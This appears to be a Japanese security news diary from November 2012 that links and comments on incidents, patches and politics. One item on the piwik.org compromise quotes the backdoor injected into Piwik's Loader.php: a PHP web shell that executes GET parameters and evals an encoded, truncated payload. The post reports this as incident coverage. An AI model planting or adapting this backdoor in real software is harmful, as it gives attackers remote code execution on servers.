Last modified: Fri Jul 3 14:48:33 2020 +0900 (JST)
このページの情報を利用される前に、注意書きをお読みください。
》 ゼロ、2ちゃんねる遠隔操作ウイルス関連での警察への捜査協力内容を報告 (日経 IT Pro, 11/30)
》 再び起きた、NTTデータに絡む偽造カード事件 (日経 IT Pro, 11/30)。6 年前の事件を紹介。
》 Nmap 6.25 holiday season release! 85 new scripts, better performance, Windows 8 enhancements, and more (Nmap.org, 11/29)
》 GhostShellの第6次プロジェクトについて (エフセキュアブログ, 11/30)
》 「都政におけるメディアに関する政策についてのアンケート」実施結果のお知らせ (MiAU, 11/28)
》 2012年11月時点の最強アンチウイルスソフトはどれなのかが判明 (gigazine, 11/30)。ホームユーサ向けアンチウイルスソフトをテスト。 Microsoft Security Essentials だけ AV-TEST CERTIFIED をもらえませんでした。
この中で、トレンドマイクロは2回のテストで、3つの小項目がいずれも100%という満点の成績。「広範囲に流行しているマルウェアに対する検出能力」はすべてのソフトが100%でしたが、ゼロデイ攻撃からの保護については、平均が89%ある中で、Microsoftは9月が69%、10月が64%という低い点数に終わり、総合で1.5点という低評価を受けています。
Microsoft Security Essentials の結果。 Protection against 0-day malware attacks, inclusive of web and e-mail threats (Real-World Testing) が特に悪いですね。 この項目が 100% なのは、 Bitdefender: Internet Security、 F-Secure: Internet Security、 Trend Micro: Titanium Maximum Security の 3 つ。 実際にどういうテストなのかは、Test Procedures > Test Modules > Protection (av-test.org) に解説されています。
Bitdefender: Internet Security は、 Average slow-down of the computer by the security software in daily use が 12。全製品の平均は 10 なので、若干重めのソフトのようです。 でも Trend Micro: Titanium Maximum Security の 16 よりは軽いです。
》 東京電力福島原子力発電所事故に関し国会及び政府に設けられた委員会の提言のフォローアップに関する有識者会議(第1回)の開催について (内閣官房, 11/30)。12/7 開催予定。民間・政府・国会 3 事故調の方など。
》 全日空、2月の国内線座席指定の全データを飛ばす (slashdot.jp, 11/29)。ANA の件。 cloudliner 氏による、原因および復旧できない理由の推測がしっくりきた。
今回の原因は、正式な運航ダイヤをシステムに入力する際に、「同じ機材なのにシステム上で機材変更として担当者が入力してしまった」といったところではないでしょうか。
(正式な運行ダイヤに決まる際の機材変更も通常処理の範囲内だと思われます)
その結果、システム上の正常処理として、機材変更による座席のシャッフルと「座席予約をし直してください」のメール送信までが自動的に行われたと推測されます。
で、元コメの巻き込まれた方がすぐに座席予約をしなおしたように、座席変更が取り消されたことを前提として以降の予約や座席の再指定が行われてしまったので、仮にバックアップがあっても元に戻すことができなくなってしまったのだと思います。
》 「パスワードの使い回しを防ぎたい」——Chromeのセキュリティ担当 「セキュリティが開発原則の一つ」、グーグルが説明会を実施 (日経 PC Online, 11/29)。Google のメディア向け説明会だったみたい。
》 JAXAにおけるコンピュータウイルス感染の発生及び情報漏洩の可能性について (JAXA, 11/30)
漏洩した可能性のある情報について
- イプシロンロケットの仕様や運用に関わる情報
- イプシロンロケット開発に関連するM-Vロケット、H-IIAロケットおよびH-IIBロケットの仕様や運用に関わる情報
》 Facebookのグループ機能で発生した プライバシーの問題 (Sophos, 11/28)
》 12月6日にも発射準備完了=北朝鮮ミサイル−米研究所 (時事, 11/30)。ジョンズ・ホプキンス大学コリア研究所。元ねた: Countdown to Pyongyang’s Missile Launch: Unha Rocket Stages at Assembly Building (38 NORTH, 11/29)
関連: 来年1月8日にテポドン発射? (ワールド&インテリジェンス, 11/27)
通常、発射の1ヶ月前までには国際海事機関(IMO)など関係する国際諸機関に通告するのが通例なので、現時点で通告していないということは、12月中に発射される見通しは少ないと思います。おそらく、技術的な部分で万全を期すために、ある程度慎重に時間をかけて準備するのではないかなと思います。
》 個人情報保護法について(鈴木正朝教授の連続Tweet) (togetter, 11/30)
Tポイントカード型ビジネスモデルのデータ連係において、どのようなことが論点になっているか、薬害オンブズパースン会議の「Tポイントサービスに関する要望書」(2012年11月20日)をざっと確認してみればいい。個人情報保護法だけだろうか?http://medicallaw.exblog.jp/19533019/
関連: 日経「個人情報売買解禁」実際は「個人情報匿名化」 (日本報道検証機構, 11/30)
内戦
ダマスカス攻防戦の勢力地図 (ワールド&インテリジェンス, 11/26)
20ヶ月前に予想できた「クラスター爆弾で子供殺害」 (ワールド&インテリジェンス, 11/27)
シリア反体制派が政府軍機を撃墜、対空ミサイル活用か (CNN, 11/29)
インターネット停止
シリア:全土でネット不通に 政権側の妨害か (毎日, 11/30)
Syria Goes Dark (EFF, 11/29)
Syria suffers Internet 'blackout'; cut off from the outside world (ZDNet, 11/29)
How were Syria's networks and Internet taken offline? (ZDNet, 11/30)
情報インフラ遮断の狙いは何か (ワールド&インテリジェンス, 11/30)
Anonymous 宣戦布告
Anonymous、シリア政権に宣戦布告--ネットが遮断されたことを受け (CNET, 11/30)
シリアで起きた「ネット遮断」はNSAの仕業だった:スノーデンの告白 (WIRED, 8/19)
リアルタイムログ解析ツール Piwik の本家サイト Piwik.org が 2012.11.26 にハクられ、改ざんされた Piwik 1.9.2 Zip ファイルが設置されたそうで。
不正なプログラムはどのようにpiwik.orgを侵害したのですか?
不正なプログラムは、我々が使っていたWordPressのプラグインのセキュリティ上の問題を利用し、piwik.orgサーバーへの部分的なアクセスを獲得しました。
WordPress ですか……。
実際に改ざんされているのは piwik/core/Loader.php で、末尾にこんなのが挿入されているそうで:
<?php Error_Reporting(0); if(isset($_GET['g']) && isset($_GET['s'])) {
preg_replace("/(.+)/e", $_GET['g'], 'dwm'); exit;
}
if (file_exists(dirname(__FILE__)."/lic.log")) exit;
eval(gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/OhLWNOVrF/IlKatiIlnbIOZ/bpzb2pAyXRl7uF/s7JuffmMlrf3y7XD09OSWbUo9RzF6XzHCz3+0pOeDW0C79s2vqtaSdOTRKZOxfXDlmJOvp8LbzHwJle/aIYEL0YWE$
関連: Piwik sourcecode backdoored (Yet Another PHP Security Blog, 2012.11.28)
Onity社キーカードロックの脆弱性、実際に悪用される (slashdot.jp, 2012.11.30)
Symantec セキュリティアドバイザリー SYM12-017 LiveUpdate パッチについて (シマンテック, 2012.11.29)。SEP 11.x および 12.0 用の修正が 2012.11.29 から LiveUpdate で配布されたそうです。らのゆきさん情報ありがとうございます。
Google Chrome 23.0.1271.95 公開。2 件のセキュリティ欠陥が修正されている。
》 世界最強の戦闘機F-22ラプターがドッグファイトでEF2000ユーロファイターにボロ負け (ニュースの社会科学的な裏側, 8/4)。 このページの人はいまいちわかってなさそうだが、 そりゃそうだろうと思ってぐぐってみると、たとえばこれ:
Farnborough 2012: "Yesterday we had Raptor salad for lunch" Typhoon pilot said after dogfighting with the F-22 at Red Flag Alaska (The Aviationist, 7/13)。Red Flag Alaska でドイツ空軍の人がですか。 この記事に出てくる Typhoon pilots at Farnborough はイギリス空軍の人みたいなので注意。
Indeed, Typhoon pilots at Farnborough said that, when flying without their external fuel tanks, in the WVR (Within Visual Range) arena, the Eurofighter not only held its own, but proved to be better than the Raptor.
増槽なし + 視程内ならタイフーンの方が強いぜ、と。 そうだろうなあ。タイフーンは機動性高そうだからね。 逆に言うと、ステルス機は「視程外から先制攻撃」が基本なわけで。
However, not all the modern and future scenarios envisage BVR (Beyond Visual Range) engagements and the risk of coming to close range 1 vs 1 (or 2 vs 2, 3 vs 3 etc) is still high, especially considered that the F-22 currently uses AIM-120 AMRAAM missiles, whose maximum range is around 100 km (below the Meteor missile used by the Typhoon).
Moreover, at a distance of about 50 km the Typhoon IRST (Infra-Red Search and Track) system is capable to find even a stealthy plane “especially if it is large and hot, like the F-22” a Eurofighter pilot said.
実戦で、その 50km まで近づけるかどうかが問題なわけですが……。
F-22 Raptor kill markings shown off by German Eurofighter Typhoons. "The F-22 is not invincible" saga continues. (The Aviationist, 7/23)。ドイツ空軍のタイフーンに F-22 キルマークが。
》 Windows 8 セキュリティ特集 #5 Windows ストア アプリ (日本のセキュリティチーム, 11/29)
》 ファイル改ざんや実行時アラートに対応する「コードサイニング証明書」を理解する (sourceforge.jp, 11/28)
》 くらし☆解説 「気になるノロウイルスの流行」 (NHK 解説委員室, 11/28)。食中毒の患者数は夏より冬の方が多い。
感染症ですが、一冬に何度も感染する場合もあります。
注意点の基本的は2つです。
身近に流行が起きているときは、食品は生で食べないこと。
手洗いを徹底すること。
》 シャープ「プラズマクラスター」掃除機に不当表示、消費者庁が措置命令 (ITmedia, 11/28)、シャープ株式会社に対する景品表示法に基づく措置命令について (消費者庁, 11/28)。消費者庁は、各社の空気清浄機についても検証・実施するように。
》 『日本国憲法改正草案』がヤバすぎだ、と話題に・・・自民党 日本国憲法改正草案対照表 2012版 (geocities.jp)。小泉純一郎風に言うと「自民党は変わった! 極右政党になった!」ということだろうか。
》 W32.Changeup - 贈られ続ける悪質なおまけ (シマンテック, 11/29)、 Signed ExtraDAT for W32/Autorun.worm.aaeb-h (McAfee, 11/28)。いまだに autorun なのか……。
》 Fake Windows 8 Key Generators Surface (trendmicro blog, 11/27)、 Windows 8用偽ライセンスキー生成ツールを確認 (トレンドマイクロ セキュリティ blog, 11/29)
》 Foreign Policy誌のトップ100:78位はTor (エフセキュアブログ, 11/26)
》 全日空、10万超の座席指定を取り消し、原因は担当者の操作ミス (日経 IT Pro, 11/29)。うひゃあ。
11月26日午後6時までに購入された2013年2月搭乗分の国内線航空券の約10万6000席が取り消し対象となる。
すごい数……。
「担当者が操作手順を守らなかったことが原因」(中略) 営業担当者2人によるWチェックを行ったが防げなかった。「今後管理職も加わって確認する手順に変える。担当者に対しても手順の遵守を徹底する」(同)としている。
うーん……。とりあえずはそうするしかないかもだけど……
対象者は同社のWebサイトや特設のコールセンターで改めて座席を指定する必要があるという。
リカバリーできなかったみたい。リカバリー可能なシステムを構築するのが対応だと思うのだけど……。
ANA の発表: 【お詫び】2013年2月の国内線航空券をご予約および座席指定済みのお客様へ (ANA, 11/28)
》 その男、金正恩 (キム・ジョンウン、朝鮮労働党第1書記)
「最もセクシーな男性は金正恩氏」、中国紙が米風刺サイトを引用 (AFPBB, 11/28)。関連:
Kim Jong-Un Named The Onion's Sexiest Man Alive For 2012 [UPDATE] (The Onion, 11/14)
People’s Daily Quotes the Onion: Kim Jong Eun ‘Sexiest Man Alive’ (wsj.com, 11/27)
民主主義の汚点:キム・ジョンウンとムハンマド・ムルシーがタイム誌「今年の人」の投票をリード (techcrunch, 11/28)
》 NTTデータ委託社員の不正事件、下請け依存に重いツケ (日経, 11/29)
逮捕された宮口正容疑者(58)は、NTTデータの孫請け会社の社員で、地方銀行13行が加盟する地銀共同センターの開発を担当する技術者だった。「センター構築初期の2003年4月からシステム開発に従事しており、システムに精通していた」(植木執行役員)という。
孫請け! 下請けですらなかったのか。 システムに精通している人が、孫請けでしかない。
府警は6〜11月に17口座から約2000万円が引き出されたとみているが、それ以前の犯行を追跡するのは難しいようだ。取引データやATMの監視カメラ映像など、犯行を裏付けるデータの保存期間に限りがあり、一定期間を過ぎると消してしまうからだ。宮口容疑者がずっと以前からシステム改変のたびに同じ手口で預金を引き出していた可能性も否定できない。
つまり、半年分しかないと?
そもそも孫請け会社の技術者がなぜ、重要システムに精通しているのか。それはIT(情報技術)産業の業界構造に深く関わる。「システム開発は仕事量が膨らむときとそうでないときの山と谷が大きいビジネス。パートナーと一緒に仕事を進めていく形態を取る」(植木執行役員)。自社では手が回らないときや、自社のコストでは採算が合わないとき、“調整弁”として中小のシステム会社を使うことが常態化している。
下請けにも本体並みのセキュリティー教育を実施するのか。岩本社長は「どこまで私たちができるのか、(事件の)結論が出た後に考えたい」と語るが、表情には苦渋の色がにじむ。セキュリティー対策は強化するほど手続きや作業が複雑になる。顧客のビジネスを止めない機動的なシステム改変がやりにくくなり、コスト上昇要因にもなり得るからだ。
教育でなんとかなる話なのかなあ。
》 Google.ro and other RO domains, victims of a possible DNS hijacking attack (Kaspersky, 11/28)。当初は DNS 毒入れ攻撃と推測した Kaspersky ですが、Update 5 では .ro TLD がヤラレたという見解になってます。
UPDATE 5 After analyzing the latest evidence, it seems the most probable scenario for today’s DNS hijacking/poisoning incident is a compromise at RoTLD - The Romanian Top Level Domain Registry. Earlier this month, a similar incident took place at the Irish Domain Registry - IEDR. You can see IEDR’s statement here. RoTLD has not come out with a statement yet.
The full list of .RO domains affected by today's incident:
We will continue to monitor the situation.
- google.ro
- yahoo.ro
- microsoft.ro
- paypal.ro
- kaspersky.ro
- windows.ro
- hotmail.ro
関連: ルーマニアのccTLDレジストリが乗っ取られた? (Geek なぺーじ, 11/29)
Effective DoS attacks against Web Application Plattforms ? #hashDoS [UPDATE2] に対して耐性があるとされたアルゴリズムでも HashDoS 攻撃が可能という指摘。 具体的には MurmurHash3、MurmurHash2、CityHash の脆弱性を指摘。 PDF 版。
MurmurHash3: JavaSE, Rubinius で使われている
MurmurHash2: Ruby (CRuby), JRuby で使われている
著者らは耐性のあるアルゴリズムとして SipHash を提案している。
SipHash: OpenDNS, Rust で使われている
対応:
ruby 1.9 におけるハッシュ飽和攻撃による DoS 脆弱性 (CVE-2012-5371) (Ruby, 2012.11.10)。ruby 1.9.3 patchlevel 327 / 2.0.0 revision 37575 で SipHash 2-4 に変更。 CVE-2012-5371
未対応:
JRuby: CVE-2012-5370
Rubinius: CVE-2012-5372
Oracle JDK, OpenJDK: CVE-2012-5373。
Bug 880705 - CVE-2012-5373 java: Murmur hash function collisions (oCERT-2012-001) (Red Hat)。様子見のご様子。
CityHash: CVE-2012-6051
関連:
Wireshark 1.8.4 / 1.6.12 登場。11 件の欠陥が修正されている。
wnpa-sec-2012-40: Wireshark ICMPv6 dissector infinite loop, fixed in 1.8.4, 1.6.12
wnpa-sec-2012-39: Wireshark 3GPP2 A11 dissector infinite loop, fixed in 1.8.4
wnpa-sec-2012-38: Wireshark RTCP dissector inifinte loop, fixed in 1.8.4, 1.6.12
wnpa-sec-2012-37: Wireshark WTP dissector infinite loop, fixed in 1.8.4, 1.6.12
wnpa-sec-2012-36: Wireshark iSCSI dissector infinite loop, fixed in 1.8.4, 1.6.12
wnpa-sec-2012-35: Wireshark ISAKMP dissector crash, fixed in 1.8.4, 1.6.12
wnpa-sec-2012-34: Wireshark EIGRP dissector infinite loop, fixed in 1.8.4
wnpa-sec-2012-33: Wireshark SCTP dissector infinite loop, fixed in 1.8.4
wnpa-sec-2012-32: Wireshark sFlow dissector infinite loop, fixed in 1.8.4
wnpa-sec-2012-31: Wireshark USB dissector infinite loop, fixed in 1.8.4, 1.6.12
wnpa-sec-2012-30: Wireshark pcap-ng host name disclosure, fixed in 1.8.4
詳細は http://www.wireshark.org/security/ をどうぞ。
Effective DoS attacks against Web Application Plattforms ? #hashDoS [UPDATE2]
PHP で mbstring.encoding_translation=On で hashdos の件、PHP 5.4.9 と同時にリリースされた PHP 5.3.19 でも修正されているので、昨日のエントリを修正しました。 榎本さん情報ありがとうございます。
mbstring.encoding_translation=On で hashdos の件、PHP 5.4.9 と同時にリリースされた PHP 5.3.19 でも修正されているので、昨日のエントリを修正しました。 榎本さん情報ありがとうございます。
》 Google.ro and other RO domains, victims of a possible DNS hijacking attack (Kaspersky, 11/28)
At the moment, our best guess is that an ISP-level DNS poisoning attack is happening in Romania. Some domains are redirected, others are not.
Kaspersky は DNS 毒入れ攻撃が行われていると推測。
UPDATE We have tested various DNS servers for the poisoning attack, and for the moment, the only ones which reply with the hijacked entry are 8.8.8.8 and 8.8.4.4 (Google's public DNS servers). We couldn't identify any other Romanian DNS server which exhibits this behavior.
UPDATE 2 You can test the DNS poisoning attack by yourself using dig: dig @8.8.8.8 google.ro or dig @8.8.4.4 google.ro
8.8.8.8 や 8.8.4.4 に問いあわせると 95.128.3.172 と答えるけど、これはニセの模様。
》 ほとんどのAndroid向けWebブラウザで利用できるプロクシ型広告ブロックツール「Adblock Plus 1.0 for Android」リリース (sourceforge.jp, 11/28)
》 国内ネットバンキングを狙うフィッシング活発化〜銀行が注意呼びかけ (so-net セキュリティ通信, 11/26)
》 「顔認識」無断で客撮影…首都圏の商業施設など (読売, 11/28)。「ららぽーと豊洲」「ららぽーと新三郷」「東京・秋葉原のパソコン店10店」「中央区のタワーマンション敷地の屋外」。
同法に詳しい岡村久道弁護士は「情報が匿名化されているなら個人情報とはいえないだろう」としながらも、「防犯目的ならともかく、商用利用では納得できない人も多いだろう。撮影していることを客や通行人にわかるように明示すべきだ」と指摘する。
》 このチャンスを逃すな!あの巨大ロボット「クラタス」にまた会える!そして、乗れる!! (マイナビニュース, 11/16)。日本科学未来館で、11月28日〜12月10日……って今日からじゃん。
展示期間中には、この「クラタス」を操縦する実演が、開発者の倉田氏と吉崎氏により予定されている。
実演日時は、12月1日、2日、9日の14:15〜14:25、16:15〜16:30。
(中略)
さらに、8日、9日の14:50〜16:00には、クラブMiraikan会員限定で試乗会(抽選)の情報も!
なんと!実際に乗れるのだ!
試乗の募集期間は、もう始まっており、申込は11月29日の17:00まで。
今回の「クラタス」展示は、ここで、12月1日、2日開催のイベント『Maker Faire Tokyo 2012』を主催するオライリー・ジャパンとのコラボレーションによって実現されたそうだ。
へぇ〜。関連:
Maker Faire Tokyo 2012でKURATASが見られます (Make: Japan, 11/7)
Maker Faire Tokyo 2012 (日本科学未来館)
》 テレビ番組が政策批判を捏造か? 番組出演の経済学者が告白し波紋 (ニコニコニュース, 11/28)
問題の発言があったのは、BSフジの情報番組「BSフジLIVE ソーシャルTV ザ・コンパス」とコラボするネット配信番組「ニコ生×BSフジ ニコニ(コ)ンパス」の24日放送回でのこと。
》 だまして利用させる“禁じ手”に歯止めを、“プライバシーエンジニア”育成も (Internet Watch, 11/26)
また、プライバシーの世界はユーザー本人が自分の情報について自己決定する世界であるため、「承諾があればOKじゃないか」という考えがあることに対して、昨今の状況から「だましが入っている」点を鈴木氏は問題視する。
「今度、高木さんと論文を書いたが、誤認を誘導するということををやるじゃないですか。だって、きれいに言ったらお客さん来ないんだもん。そこのせめぎ合いで、現場は『ま、クリックさせりゃいいだろ』とか『OKボタン押させりゃいいや』というところの結果、それが法的同意・承諾にならない方向に流れていくということがある。『難しい』とか言っているのではなく、鼻からだます気満々系という。これは実は僕らはよく分かっているわけですよ。実はクリアに黒なんです。ここを黒だと言わない社会は僕はいびつだと思っている。法制度はそれ(黒白)を着けるべきだと思う。これをいけしゃあしゃあと『イノベーションを阻害する』と言うんですよね。そういう人たちがノイズになって健全なルール形成が曲がる。産業界の方がむしろ、そういうだまし系の事業者をたたくというところでルール形成の土俵が整っていくと思う。」(鈴木氏)
高木氏も、「だまして利用させることに対する歯止め」が日本には足りないと強調する。米国ではFTC(連邦取引委員会)が欺瞞的な行為に対して訴訟を起こすことが可能で懲罰的賠償というものもあり、プライバシーもその対象に入っているために過去にも指導ができているという。
「イノベーションを阻害するというのではなく、しっかりとそういう仕掛けがあるからこそ、できる限りスレスレのところで挑戦していける。一方でむちゃなことをする“抜け駆け”が出てきた時にきちんとそれが止まる仕掛けがあるからこそ、健全なビジネスの発展があると思う。」(高木氏)
》 「LINE」Android版アップデートで電話帳を強制同期、友達追加する不具合 (ITmedia, 11/27)。関連:
それでもあなたはLINEを使い続けますか? バグによる意図しない電話帳アップロードに垣間見えるLINEの姿勢 (I believe in technology, 11/27)
【注意】LINEが勝手に電話帳を同期して友達を増やすバグアップデートで被害者多数の模様 (togetter, 11/27)
【Android先行公開】FacebookアカウントでLINEの登録・引継ができるよう認証・連携機能を搭載 (LINE 公式ブログ, 11/26)。末尾に不具合情報。
Android版LINE 3.3.0で発生した不具合のお詫びと修正のご報告 (LINE 公式ブログ, 11/27)
》 原発廃炉なら4社債務超過 損失計4兆円超 経産省試算 (朝日, 6/18)。電力屋が怖がっているのは、廃炉そのものではなくて債務超過。
債務超過になる理由は、原発を廃炉にすると決めた瞬間、これまで資産だった原発は資産としての価値がなくなるからだ。資産の目減りを損失として処理しなければならず、大きな赤字を一気に抱えてしまう。
》 10月11日【内容起こし】玉川徹氏の報告:『原発ゼロのせいで2030年電気代が2倍になるんでしょうか?』@そもそも総研【電気代2倍の誤解を解消しましょう!】 (ぼちぼちいこか。。。, 10/12)。そもそも総研 10/11 の書き起こし。 脱原発しなければ電気料金は上がらずに済むと思っている人がまだまだいるようだが、そうではない。脱原発しようがしまいが、電気料金は同じように上がる。
》 オリンパスに嵐を巻き起こした男−ウッドフォード氏、会社人生を語る (ウォール・ストリート・ジャーナル日本版, 11/28)
》 中国:政府のチベット政策に抗議 3人が焼身自殺で死亡 (毎日, 11/27)
》 原発燃料集合体変形:規制委、東電以外でも調査へ (毎日, 11/28)。調べてみたら 1/3 が変形していた。ひぃ。
東京電力柏崎刈羽原発(新潟県)5号機で、原子炉で使った燃料集合体の部品に変形が見つかった問題について、原子力規制委員会は28日、点検した燃料集合体47体のうち18体に変形が確認されたとの東電の調査結果を報告した。変形はいずれも、集合体を覆う金属カバーを再利用して装着する際に起きていた。規制委は同日、他の電力会社についても同様のケースがないか調べることを決めた。
関連: 第14回 原子力規制委員会資料: 東京電力株式会社柏崎刈羽原子力発電所第5号機の燃料集合体ウォータ・ロッドの曲がりについて (原子力規制委員会, 2012.11.28)
》 Megaupload閉鎖後に映画の興収が減少、海賊版の宣伝効果は規模に反比例 (gigazine, 11/28)
これは、以前から囁かれていた「海賊版をプロモーションに活用する」というのが有効であることを示しています。そもそもお金を払う気のない人はターゲットになり得ませんが、その消費者を口コミのハブとすることで、潜在的に存在しているお金を払ってもいいと考えている消費者に情報が届く、というわけ。
》 レプリケーションを使わないMySQLの冗長化 (Yahoo! JAPAN デベロッパーネットワーク, 11/22)
中東情勢最大の危機が到来! イスラエル軍が戦線拡大する本当の狙いとは (JBpress, 11/21)。停戦前に書かれた記事。とりあえず今日まで停戦は続いているようだけど、いつまで続くやら。
アマンプールvsメシャル (ワールド&インテリジェンス, 11/23)。「ハマス強硬派 No.1」のハリド・メシャル氏へのインタビュー。
ハマス 1996 (ワールド&インテリジェンス, 11/25)
ガザ:イランとエジプト ハマスを巡る綱引き続く (毎日, 11/25)
ガザ停戦で、戦略的な岐路に立つハマス (ウォール・ストリート・ジャーナル日本版, 11/27)
イランの影響がハマスの戦闘集団の決意を固くしたのと同じように、これら3カ国の穏健で平和的な野心はメシャル氏に影響を及ぼしているようにみえる。メシャル氏は長年、ハマスの最も挑戦的な強硬派とみられてきたが、最近はハマス内のハト派を代表する人物として登場している。
あら……。
米国とイスラエルはいずれもハマスをテロリスト集団とみているし、ハマスはイスラエル破壊という自らの目標を捨てていない。
ハマスはまた、イランから資金を受け続けている。イスラエルのある将軍は、紛争が激化していた際にも、イランがガザ地区のパレスチナ武装勢力に武器を補充しようとしているとの軍事情報があったと述べている。
テロ支援国家イランとイスラエル・USA の戦いについては、「シークレット・ウォーズ」を参照。
》 2012/11/26 とくダネTPP討論 (togetter, 11/26)。ラストのムネオ氏の返しがすばらしい。
》 日本維新の会には失望、橋下徹氏は輝いていた原点に戻るべきだ (日経BP, 11/27)。ただしソースは大前研一氏。
そもそも、大阪で素晴らしい改革に着手していた橋下さんが国政進出をこれだけ急いだことに疑問を感じる。
「そもそも、大阪で素晴らしい改革に着手していた橋下さん」という認識が、そもそも間違っているのでは。
》 委託社員の逮捕についてNTTデータが経緯を説明 (日経 IT Pro, 11/27)。関連: キャッシュカードの取引情報の不正取得について (NTTデータ, 11/27)。詳細情報。
ATMを利用した、地銀共同センター参加行と提携金融機関の間での取引情報が不正に取得されました。
注上記取引情報は口座番号、暗証番号を含んでおり、この情報をもとに偽造カードを作成し犯行に及んだものと思われます。
(中略)
容疑者は地銀共同センターのシステムに精通し、かつ高度で専門的な知識を使って、通常のシステム運用者、開発技術者では取得することができない情報を不正に取得したとみられます。詳細な手口については、警察の捜査に協力し調査を進めています。
》 Amazon EC2,FreeBSDがAmazon Marketplaceに登場 (FreeBSD Daily Topics, 11/27)。FreeBSD, Debian, CentOS。
》 【「この国」という言い方はおかしい!】佐藤正久議員が見事なブーメランを放った件 (togetter, 11/22)。自党の総裁や自分自身もバッサリ。
》 大荒れ:猛吹雪の北海道、自衛隊に災害派遣要請 (毎日, 11/27)。
登別市では送電線の鉄塔(高さ26メートル)が倒壊。北海道電力によると、復旧には3日程度かかる見通しで、同市など7市町は暖房などを使えなくなった住民向けに避難所を設置し約300人が避難した。
》 私は産経新聞の今回の決定に抗議します。 (atarusasaki.net/blog, 11/27)。寄稿文「坂口安吾『堕落論』を紹介する(仮題)」掲載拒否。
》 日本初、KDDIと海上保安庁がコラボして作った船上携帯電話基地局の開設試験を密着取材 (gigazine, 11/27)。試験成功のようで。
JVNVU#281284: Samsung 製プリンタに SNMP コミュニティ文字列がハードコードされている問題 (JVN, 2012.11.27)。SNMP でいじり放題みたい。 当該プリンタ、DELL にも OEM されている模様。 2012.10.31 以降に出荷されたものは修正されているそうだが、 更新ファームはまだ公開されていない。関連:
VU#281284 - Samsung Printer SNMP Backdoor (l8security.com, 2012.11.28)。発見者 Neil Smith さんによる。
Researcher reveals backdoor access in Samsung printers (ZDNet, 2012.11.28)。HD Moore さん、自身のプリンタで再現できたそうで。
Hard-coded password found in Samsung printers, security fix planned (Sophos, 2012.11.27)
各社SCADAソフトウェアに20以上の脆弱性——セキュリティ研究者が報告 リモートからのコード実行、DoS攻撃に対する脆弱性など (ComputerWorld.jp, 2012.11.28)
「これらのバグについて最も興味深いことは、とてもありきたりですぐに発見できたことだ」とポートノイ氏は記している。「最初のセキュリティ・ホールは、ソフトウェアをインストールしてからわずか7分後に見つかった。エンタープライズ向け、あるいは個人向けのソフトウェア監査に長い間携わっている人にとっては、それらと比較するとSCADA(の脆弱性)はばかばかしいほど単純なものだ」(同氏)。
Java Zero-Day Exploit on Sale for ‘Five Digits’ (Kerbs on Security, 2012.11.27)。JRE 7 Update 9 の 0-day 欠陥を「5桁」で売り出し中。ドル建てだろうから、円高の今がチャンス (違)
Google Chrome 23.0.1271.91 公開。7 件のセキュリティ欠陥が修正されている。
“Adobe Reader” のセキュリティ機能「サンドボックス」を回避するゼロデイ脆弱性にご用心 (トレンドマイクロ セキュリティ blog, 2012.11.27)
問題の脆弱性の詳細が入手できないことから、トレンドマイクロでは、以下のセキュリティ対策を講じることをお勧めします。
トレンドマイクロだけでなく、他のセキュリティベンダーからも、確認できたという情報がないんだよね……。うーむ。
関連:
Apple QuickTimeのTeXMLファイルの処理の不備により任意のコードが実行される脆弱性 (CVE-2012-3752)に関する検証レポート (NTTデータ先端技術, 2012.11.27)
QuickTimeの脆弱性を悪用するコード公開〜今すぐアップデートを (so-net セキュリティ通信, 2012.11.28)
PHP5.4.8までにhashdos攻撃の危険性? (togetter, 2012.11.23)。mbstring.encoding_translation=On の場合 (デフォルトは "0")、 hashdos 対策コードが効かない状況だった模様です。PHP 5.4.9 で対応されています。
Effective DoS attacks against Web Application Plattforms ? #hashDoS [UPDATE2]
PHP5.4.8までにhashdos攻撃の危険性? (togetter, 2012.11.23)。mbstring.encoding_translation=On の場合 (デフォルトは "0")、 hashdos 対策コードが効かない状況だった模様です。PHP 5.4.9 で対応されています。
マイクロソフト脆弱性調査アドバイザリ MSVR12-018: Symantec Ghost のメモリ破損により、任意のコードが実行される (Microsoft, 2012.11.21)。SYM12-016 - Symantec Ghost Solution Suite にメモリ破損の問題 (シマンテック, 2012.10.10) の件は Microsoft が発見したようで。
関連:
マイクロソフト脆弱性調査アドバイザリ MSVR12-019: Oracle AutoVue DGN の解析の脆弱性により、リモートでコードが実行される (Microsoft, 2012.11.21)。CVE-2012-1758
マイクロソフト脆弱性調査アドバイザリ MSVR12-020: Oracle AutoVue DXF の解析の脆弱性により、リモートでコードが実行される (Microsoft, 2012.11.21)。CVE-2012-1759
嘉田知事が新党代表就任 代表代行に飯田哲也氏 (日経, 11/27)
嘉田由紀子知事が代表…「日本未来の党」結成へ (読売, 11/27)
嘉田知事新党は「日本未来の党」 卒原発掲げ結成を表明 (朝日, 11/27)
橋下さんに〝失望〟したので…「嘉田新党」結成表明 (産経, 11/27)
嘉田知事、滋賀では知名度あるけど全国的にはなぁ……と思っていたら、 全国的に知名度のある人が代表代行に。 何を目指すのかがものすごくわかりやすい人選だなあ。 ただし、まだ政党要件を満たしていない模様。
……と言っている間に、「国民の生活が第一」が解党の上合流するという話が:
生活 解党し嘉田新党に合流へ (NHK, 11/27)
「国民の生活が第一」の候補者のポスター印刷に待ったがかかった、とかいう話があったが、これか……。
》 維新ドタバタ 公認候補辞退続出「ガラクタ市のようだ」 (産経, 11/27)
維新の候補者はもともと、公募が原則。竹中平蔵元総務相を長とする候補者選定委員会で選抜、1泊研修を経て決めるとしていたが、そうした仕組みも崩壊し、京都1区は辞退者の穴埋めのため、公募を経ずに京都府議を選定した。
ある維新の地方議員は「公募のルールを無視してだれでもいいから擁立しろという状態。選考基準がわからず、ガラクタ市のようだ」と語った。
クロトワ「腐ってやがる……早すぎたんだ」
》 ドメイン名は親の心子知らず? DNSの委任構造と生まれながらの“業” (Internet Watch, 11/26)。「よくわからないからガンダムで説明して!」 と言われたら、最初の 4 つはなんとかなりそうだけど、そのあとの 3 つが難しいなあ。
また、そもそも論として、名前の委任先を名前で指定するという設計は不自然であるという説明も行った。森下氏は、この方式が採用されたことには理由があったが、それでも、名前でなくIPアドレスで指定するようにすればよかったのではないかという案を提示した。
理由の解説は「(今回は割愛)」だったのだけど、どこかにわかりやすい説明はあるのかなあ。
》 NTTデータ委託社員が逮捕、担当システム悪用し偽造カードで現金引き出した容疑 (日経 IT Pro, 11/27)、 業務委託先企業社員の逮捕について (NTT データ, 11/26)
》 今、FC2ブログがヤバイらしい・・・【本当は恐いFC2ブログ】 (NAVER まとめ, 11/26)。11/18 ごろから Google 八分されているようです。
》 世界の運命を握る「影の銀行システム」 (田中 宇, 11/22)
